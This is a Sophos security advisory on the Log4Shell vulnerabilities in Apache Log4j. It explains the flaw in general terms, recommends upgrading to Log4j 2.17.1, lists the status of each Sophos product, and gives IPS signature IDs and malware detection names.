Advisory: Log4j zero-day vulnerability AKA Log4Shell (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832)

Torna alla panoramica degli advisory di sicurezza
Critical
CVE
CVE-2021-44228
CVE-2021-45046
CVE-2021-45105
CVE-2021-44832
Updated:
Prodotto/i
Client Authentication Agent
Cloud Optix
Intercept X Endpoint
Intercept X for Server
Reflexion
SafeGuard Enterprise (SGN)
Sophos Authenticator
Sophos Central
Sophos Connect Client 2.0
Sophos Email
Sophos Email Appliance (SEA)
Sophos Enterprise Console (SEC)
Sophos Firewall
Sophos Home
Sophos Mobile
Sophos Mobile EAS Proxy
Sophos RED
Sophos SSL VPN client
Sophos Transparent Authentication Suite (STAS)
Sophos UTM
Sophos UTM Manager
Sophos Web Appliance (SWA)
Sophos Wireless
Sophos ZTNA
SophosLabs Intelix
ID di pubblicazione sophos-sa-20211210-log4j-rce
Versione dell'articolo 27
Prima pubblicazione
Soluzione alternativa No

Overview

On Thursday December 9, 2021, a severe remote code vulnerability was revealed in Apache’s Log4J , a very common logging system used by developers of web and server applications based on Java and other programming languages. The vulnerability affects a broad range of services and applications on servers, making it extremely dangerous—and the latest updates for those server applications urgent. Sophos has observed widespread malicious attempts to exploit internet facing services using this vulnerability.

The vulnerability makes it possible for any attacker who can inject text into log messages or log message parameters into server logs that load code from a remote server; The targeted server will then execute that code via calls to the Java Naming and Directory Interface (JNDI). JNDI interfaces with a number of network services, including the Lightweight Directory Access Protocol (LDAP), Domain Name Service (DNS), Java’s Remote Interface (RMI), and the Common Object Request Broker (CORBA). Sophos has seen efforts to exploit LDAP, DNS and RMI, using a URL tagged to those services redirected to an external server.

Patches for Log4j

While there are steps that customers can take to mitigate the vulnerability, the best fix is to upgrade to the patched version, already released by Apache in Log4j 2.15.0.

Additional Log4j bugs, CVE-2021-45046 and CVE-2021-45015, have caused Apache to update Log4j from 2.15.0 to the version 2.17.0. A fourth CVE, CVE-2021-44832, was reported just after the Christmas 2021 weekend, on 2021-12-28, causing Apache to update Log4j to version 2.17.1. Sophos recommends you update to Log4j 2.17.1.

If you have already started patching with version 2.15.0 but haven't completed the update on all systems, our recommendation is to finish patching any remaining systems with 2.17.1. This ensures all systems will have a minimum version of at least 2.15.0 which addresses the critical CVE-2021-44228 vulnerability, and then you can then go back and upgrade those systems to 2.17.1 so that you have the same version everywhere.

What Sophos products are affected?

Sophos is reviewing and patching all affected applications and services as part of its incident response process.

Product or ServiceStatusDescription
Cloud OptixPatched

Users may have noticed a brief outage on Friday, December 10, 2021 around 12:30 PM UTC as updates were deployed.

Sophos performed host forensics and log analysis in the Cloud Optix environment and determined that the vulnerability was not successfully exploited prior to fixes being deployed.

PureMessageNot vulnerablePMX does not use Log4j.
ReflexionNot impactedReflexion does not run an exploitable configuration.
SafeGuard Enterprise (SGN)Not vulnerableSGN does not use Log4j.
SG UTM (all versions)Not vulnerableSG UTM does not use Log4j.
SG UTM Manager (SUM) (all versions)Not vulnerableSUM does not use Log4j.
Sophos AuthenticatorNot vulnerableSophos Authenticator does not use Log4j.
Sophos CentralNot impactedSophos Central does not run an exploitable configuration.
Sophos Endpoint protection (Windows/Mac/Linux)Not vulnerableSophos Endpoint protection (Intercept X Endpoint, Intercept X for Server) does not use Log4j.
Sophos EmailPatchedSophos performed host forensics and log analysis in the Sophos Email environment and determined that the vulnerability was not successfully exploited prior to fixes being deployed.
Sophos Email ApplianceNot vulnerableSEA does not use Log4j.
Sophos Enterprise Console (SEC)Not vulnerableSEC does not use Log4j.
Sophos Firewall (all versions)Not vulnerableSophos Firewall does not use Log4j.
Sophos Firewall auxiliary clientsNot vulnerable

None of the Sophos Firewall auxiliary clients use Log4j:

  • Sophos Connect Client
  • Sophos SSL VPN client
  • Sophos Transparent Authentication Suite (STAS)
  • Sophos Authentication for Thin Client (SATC) (EOL)
  • Client Authentication Agent (all versions)
Sophos HomeNot vulnerableSophos Home does not use Log4j.
Sophos MobileNot impactedSophos Mobile (in Central, SaaS, and on-premises) does not run an exploitable configuration.
Sophos Mobile EAS ProxyImpacted

The Sophos Mobile Standalone EAS Proxy was affected by CVE-2021-44228 and the fix was included in version 9.7.2 which was released on Monday December 13, 2021. The fix is also available in version 9.7.3 and all subsequent releases.

Customers can download the latest version of the Standalone EAS Proxy Installer from the Sophos website.

Sophos REDNot vulnerableRED does not use Log4j.
Sophos Web ApplianceNot vulnerableSWA does not use Log4j.
Sophos WirelessNot vulnerableSophos Wireless access points do not use Log4j.
Sophos ZTNANot vulnerableSophos ZTNA does not use Log4j.
SophosLabs IntelixNot vulnerableSophosLabs Intelix does not use Log4j.

How are Sophos customers protected?

Sophos Managed Threat Response (MTR) customers

Sophos is actively monitoring MTR customer accounts for post-exploit activity.

IPS Signatures

IPS signatures were published on December 11, 2021.

Sophos Firewall

  • SIDs are 2306426, 2306427, 2306428, 58722, 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58734, 58735, 58736, 58737, 58738, 58739, 58740, 58741, 58742, 58743, 58744, 58751, 58784, 58785, 58786, 58787, 58788, 58789, 58790, 58795, 58801, 58802, 58803, 58804, 58805, 58806, 58807, 58808, 58809, 58810, 58811, 58812, 58813, 2306526

Sophos Endpoint

  • SIDs are 2306426, 2306427, 2306428, 2306438, 2306439, 2306440, 2306441, 2306490, 2306493, 2306494, 2306495, 2306496, 2306497, 2306499, 2306526, 2306569, 2306570, 2306571, 2306572, 2306573, 2306574

Sophos SG UTM

  • SIDs are 58722, 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58734, 58735, 58736, 58737, 58738, 58739, 58740, 58741, 58742, 58743, 58744, 58751, 58784, 58785, 58786, 58787, 58788, 58789, 58790, 58795, 58801, 58802, 58803, 58804, 58805, 58806, 58807, 58808, 58809, 58810, 58811, 58812, 58813

Sophos XDR customers

Sophos XDR customers can use Sophos LiveQuery to help identify vulnerable Log4j components in their environment.

Example queries are maintained on the Sophos Community forum:

If you identify the vulnerable component, you should update immediately and review your logs for any signs of exploitation attempts. Sophos expects that a successful exploitation will not be logged by Log4j itself, requiring correlation with other log sources.

Malicious Payload Detections

SophosLabs has published detections for the malicious payloads coming via Log4shell. The detection are predominantly for crypto miners, attack scripts and malicious java downloaders. Please note that not all of these payloads are exclusive to Log4Shell and may be arriving via another vector.

  • Troj/JavaDl-AAN
  • Troj/Java-AIN
  • Troj/Java-AIP
  • Troj/JavaDI-AAO
  • Troj/BatDl-GR
  • Troj/Ransom-GME
  • Troj/StealthL-A
  • Troj/Bckdr-RYB
  • Troj/Khonsari-A
  • Troj/PSDl-LR
  • Mal/JavaKC-B
  • XMRig Miner (PUA)
  • Mal/ShellDl-A
  • Mal/ExpJava-AL
  • Mal/ExpJava-AN
  • Mal/ExpJava-AO
  • Mal/ExpJava-AQ
  • App/StlthLdr-A
  • Linux/DDoS-DT
  • Linux/DDoS-DS
  • Linux/Miner-ABU
  • Linux/Miner-ADG
  • Linux/Miner-ADH
  • Linux/Miner-ZS
  • Linux/Miner-WU
  • Linux/Rootkt-M
  • Linux/Swrort-G
  • Linux/Miner-EQ
  • Linux/DDoS-CI
  • Linux/DDoS-CIA

 

Related Information